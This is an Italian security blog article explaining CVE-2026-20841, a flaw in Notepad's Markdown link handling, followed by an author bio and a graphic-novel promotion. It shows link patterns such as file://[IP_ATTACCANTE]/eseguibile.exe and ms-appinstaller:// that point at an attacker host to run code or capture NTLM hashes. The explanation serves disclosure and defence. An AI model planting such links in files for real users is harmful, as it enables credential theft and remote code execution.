C’è stato un tempo in cui Notepad(il caro vecchio Blocco Note) era il porto sicuro della semplicità: un foglio bianco, testo piano e zero pretese. Ma con la rimozione definitiva di WordPad (avvenuta ufficialmente a fine 2024/inizio 2025), Microsoft ha deciso di dare una marcia in più al suo editor storico.
L’ultimo grande aggiornamento di Notepad Classic (passato alla nuova architettura UWP/WinUI 3 nel corso del 2024-2025) ha introdotto:
Supporto nativo al Markdown.
Correttore ortografico avanzato.
Gestione dei tab e salvataggio automatico della sessione.
Strumenti grafici per l’anteprima di contenuti ricchi.
Integrazione con Copilot
Insomma, Notepad ha smesso i panni dell’umile scudiero per diventare un sostituto di WordPad. Ma, come insegna la sicurezza informatica, “più funzioni equivalgono a più problemi”.
Advertising
Cos’è il Markdown?
Per capire la portata della vulnerabilità, è necessario comprendere lo strumento che l’ha generata.
Il Markdown è un linguaggio di markup leggero creato per formattare il testo utilizzando una sintassi semplice e leggibile, che può essere poi convertita facilmente in HTML o altri formati.
A differenza di un editor “WYSIWYG” (come Word), dove premi un tasto per fare il grassetto, in Markdown vengono usati simboli:
**Testo** diventa Testo (Grassetto).
# Titolo crea un’intestazione.
[Testo](URL) crea un collegamento ipertestuale cliccabile.
L’introduzione del Markdown in Notepad significa che l’applicazione non si limita più a visualizzare caratteri passivamente, ma deve interpretare (fare il parsing) dei simboli e renderizzare (disegnare a video) elementi interattivi.
È proprio in questa fase di interpretazione dei link [Testo](URL) che si annida la falla.
Advertising
La Vulnerabilità CVE-2026-20841
Mentre gli utenti celebravano la possibilità di scrivere documenti formattati senza aprire Office, i ricercatori hanno scoperto una falla critica nel motore di rendering del nuovo Notepad.
Il cuore del problema non risiede nel linguaggio Markdown in sé, ma nel modo in cui l’engine di Notepad (basato su WinUI 3) gestisce gli URI Scheme (identificatori di risorse) non convenzionali.
Il principio di funzionamento della vulnerabilità risiede nella mancata sanificazione dei protocolli accettati. Un attaccante può sfruttare schemi URI pericolosi come file://, ms-appinstaller:// e ms-search://.
Un attaccante può nascondere istruzioni malevole all’interno di un banale file .txt o .md usando link formattati in Markdown:
Esecuzione di Codice (RCE): Sfruttando lo schema ms-appinstaller:// o file://[IP_ATTACCANTE]/eseguibile.exe, un link può avviare un programma o l’installazione di pacchetti software malevoli direttamente da un server web, bypassando i filtri di sicurezza standard dei browser.
Esfiltrazione di Credenziali (SMB): Usando il protocollo file://[IP_ATTACCANTE], Notepad costringe Windows a connettersi a un server remoto. Durante il tentativo di connessione, il sistema invia automaticamente l’hash NTLMv2 dell’utente, che può essere catturato e craccato dall’attaccante.
Una volta visualizzato il file, Notepad renderizza questi collegamenti evidenziandoli con un colore differente, rendendoli interattivi.
Sebbene sia necessario il presupposto del “CTRL + Click” per attivare il collegamento (una misura di sicurezza standard in molti editor Microsoft), il rischio rimane elevato a causa di tecniche di social engineering.
Qui attivato responder nel’host remoto è stato catturato hash ntlm.
Cosa succede dopo l’aggiornamento
In seguito all’applicazione della patch per la CVE-2026-20841, l’architettura di Notepad subisce una trasformazione profonda che ne altera sia il comportamento operativo che il livello di isolamento all’interno del sistema operativo.
La modifica più significativa riguarda l’introduzione di un filtro dinamico sui protocolli URI all’interno del motore di rendering Markdown. Prima dell’aggiornamento, il software trasmetteva le istruzioni di collegamento direttamente alla shell di Windows senza una validazione preventiva.
Con la nuova versione, Notepad implementa una “allow-list” che neutralizza i tentativi di richiamare protocolli pericolosi verso percorsi remoti.
Parallelamente, l’aggiornamento consolida la transizione di Notepad verso l’ambiente WinUI 3, forzando l’esecuzione del processo all’interno di un AppContainer sandbox.
Questo significa che, anche nell’eventualità di una futura vulnerabilità nel parsing del codice Markdown, il codice malevolo rimarrebbe confinato in un perimetro ristretto, privo dei permessi necessari per accedere ai file di sistema.
Conclusione
L’evoluzione di Notepad è il perfetto esempio di come l’aggiunta di complessità in software storicamente “sicuri perché semplici” possa introdurre nuovi vettori di compromissione. In attesa di una patch definitiva, il consiglio è di prestare massima attenzione ai file .txt o .md provenienti da fonti non attendibili, specialmente se invitano all’interazione con link integrati.
📢 Resta aggiornatoTi è piaciuto questo articolo? Rimani sempre informato seguendoci su Google Discover (scorri in basso e clicca segui) e su 🔔 Google News. Ne stiamo anche discutendo sui nostri social: 💼 LinkedIn, 📘 Facebook e 📸 Instagram. Hai una notizia o un approfondimento da segnalarci? ✉️ Scrivici
Ho iniziato la mia carriera occuparmi nella ricerca e nell’implementazioni di soluzioni in campo ICT e nello sviluppo di applicazioni. Al fine di aggiungere aspetti di sicurezza in questi campi, da alcuni anni ho aggiunto competenze inerenti al ramo offensive security (OSCP), occupandomi anche di analisi di sicurezza e pentest in molte organizzazioni.
Aree di competenza:Ethical Hacking, Bug Hunting, Penetration Testing, Red Teaming, Security Research, Cybersecurity Communication
Betti RHC, la prima graphic novel al mondo dedicata alla cybersecurity awareness, ha finalmente il suo sito ufficiale. Uno spazio tutto suo dove scoprire il progetto, sfogliare le copertine degli episodi e immergersi nel mondo di Betti: la giovane laureanda in informatica che, dopo la morte misteriosa del padre, si trasforma nell'hacker più potente del mondo. Una storia avvincente che, episodio dopo episodio, affronta una minaccia digitale diversa — dal phishing al ransomware, fino al cyberbullismo — e insegna a riconoscerla e a difendersi, senza che sembri mai una lezione.
Sul sito trovate tutto ciò che rende Betti un progetto diverso dal solito: la sua filosofia, le anteprime delle tavole e il racconto di come nasce ogni volume. Perché dietro Betti RHC c'è solo lavoro umano: ogni tavola è disegnata interamente a mano dagli artisti del Gruppo Arte di Red Hot Cyber, senza alcun uso di intelligenza artificiale. E a garantire che ogni storia sia realistica e tecnicamente corretta c'è la supervisione degli hacker etici del gruppo HackerHood, che mantengono il racconto fedele al mondo reale della sicurezza informatica.
C'è spazio anche per le aziende, che possono usare Betti come strumento di awareness diverso dai soliti corsi: acquistare i volumi, personalizzarli con il proprio brand o sponsorizzare nuovi episodi. E come primo regalo, l'episodio "Byte the Silence", dedicato al cyberbullismo, è scaricabile gratuitamente per uso personale.